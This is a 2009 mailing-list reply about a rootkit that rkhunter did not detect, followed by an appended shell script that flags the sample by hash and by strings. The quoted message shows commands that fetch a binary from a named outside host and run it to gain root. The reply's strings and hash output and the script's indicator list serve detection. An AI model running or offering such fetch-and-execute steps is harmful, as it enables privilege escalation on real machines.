Re: rootkit not found by rkhunter
On Sun, 4 Oct 2009 10:15:35 -0400
Thomas Krichel <krichel@openlib.org> wrote:
> I am running debian testing, 2.6.30 kernel.
>
> I have a rootkit installed on a bunch of machines that rkhunter
> does not find. This appears after infection with SHV4 / SHV5,
> which rkhunter found.
>
> Here it works to allow a non-root user to become root
>
> krichel@fricka:~$ mkdir a
> krichel@fricka:~$ cd a
> krichel@fricka:~/a$ ls -l
> total 0
> krichel@fricka:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:47:42-- http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886 6.88K/s
> in 1.0s
>
> 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
>
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a#
>
> Here is a situation where it does not work
>
> krichel@chichek:~$ mkdir a
> krichel@chichek:~$ cd a
> krichel@chichek:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:31:15-- http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886 37.8K/s
> in 0.2s
>
> 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
>
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied
>
>
> Does anybody here know how to delete this kit?
>
>
> Cheers,
>
> Thomas Krichel http://openlib.org/home/krichel
> RePEc:per:1965-06-05:thomas_krichel
> skype: thomaskrichel
This file should at least be deleted from the host.
fgeek@foo:~$ file a
a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not
stripped
fgeek@foo:~$ strings a
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
socket
exit
execl
ftruncate
perror
sendfile
unlink
mkstemp
mmap
getpagesize
getgid
getuid
__libc_start_main
GLIBC_2.1
GLIBC_2.0
PTRh
([^_]
[^_]
mmap
socket
mkstemp
unlink
ftruncate
/bin/sh
/tmp/tmp.XXXXXX
fgeek@foo:~$ md5sum a
b950af01be61a8cbf5d479430738bd18 a
fgeek@foo:~$ sha1sum a
639536caea56554406106ad8679115971485f3a2 a
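A small triage helper, added here as an example and not part of fgeek's message or the Debian thread: it checks a file against the MD5/SHA-1 fgeek posted for "a", and counts how many of the library imports and strings from his `strings` output are present, so that a recompiled copy (same source, different digests) is still flagged. It assumes GNU coreutils `md5sum`/`sha1sum` and a `grep` that accepts `-a`; the indicator list is taken from the posted output, and the threshold of 6 matches is this example's choice.

```shell
#!/bin/sh
# Added triage helper (not from the thread): compare a suspicious file with
# the digests fgeek posted for "a", and grep for the strings seen in his
# `strings` output. grep -a is used instead of strings so it runs on a
# minimal host without binutils. Assumes GNU coreutils md5sum/sha1sum.

# Hashes fgeek reported for the downloaded "a".
KNOWN_MD5="b950af01be61a8cbf5d479430738bd18"
KNOWN_SHA1="639536caea56554406106ad8679115971485f3a2"

# Strings from the posted output that together look like a local-root
# helper: temp file + ftruncate/mmap/sendfile, then execl of /bin/sh.
INDICATORS='/bin/sh /tmp/tmp.XXXXXX mmap mkstemp sendfile ftruncate execl getuid'

# hash_match FILE [MD5 SHA1]: print "match" if either digest equals the
# reference (defaults to fgeek's values), otherwise "none".
hash_match() {
    f=$1
    want_md5=${2:-$KNOWN_MD5}
    want_sha1=${3:-$KNOWN_SHA1}
    got_md5=$(md5sum "$f" | cut -d' ' -f1)
    got_sha1=$(sha1sum "$f" | cut -d' ' -f1)
    if [ "$got_md5" = "$want_md5" ] || [ "$got_sha1" = "$want_sha1" ]; then
        echo match
    else
        echo none
    fi
}

# indicator_count FILE: how many of the indicator strings occur in the file.
indicator_count() {
    f=$1
    n=0
    for pat in $INDICATORS; do
        if grep -a -q -F -- "$pat" "$f"; then
            n=$((n + 1))
        fi
    done
    echo "$n"
}

# triage FILE: KNOWN (digest matches the posted sample), SUSPECT (same
# indicator set, e.g. a rebuilt copy of the same source) or CLEAN.
# The cut-off of 6 out of 8 indicators is this example's choice.
triage() {
    f=$1
    if [ "$(hash_match "$f")" = match ]; then
        echo KNOWN
    elif [ "$(indicator_count "$f")" -ge 6 ]; then
        echo SUSPECT
    else
        echo CLEAN
    fi
}

# Usage: ./triage.sh FILE...
# e.g. find /tmp /var/tmp /dev/shm -type f -perm -u+x | xargs ./triage.sh
for f in "$@"; do
    echo "$f: $(triage "$f")"
done
```

The digest check only identifies this exact build; the indicator count exists because an attacker who recompiles the same source changes both digests but keeps the same libc imports and the `/tmp/tmp.XXXXXX` and `/bin/sh` strings. Either result is a reason to pull the file off the host and look at what else was dropped alongside it, not a proof that the host is otherwise clean.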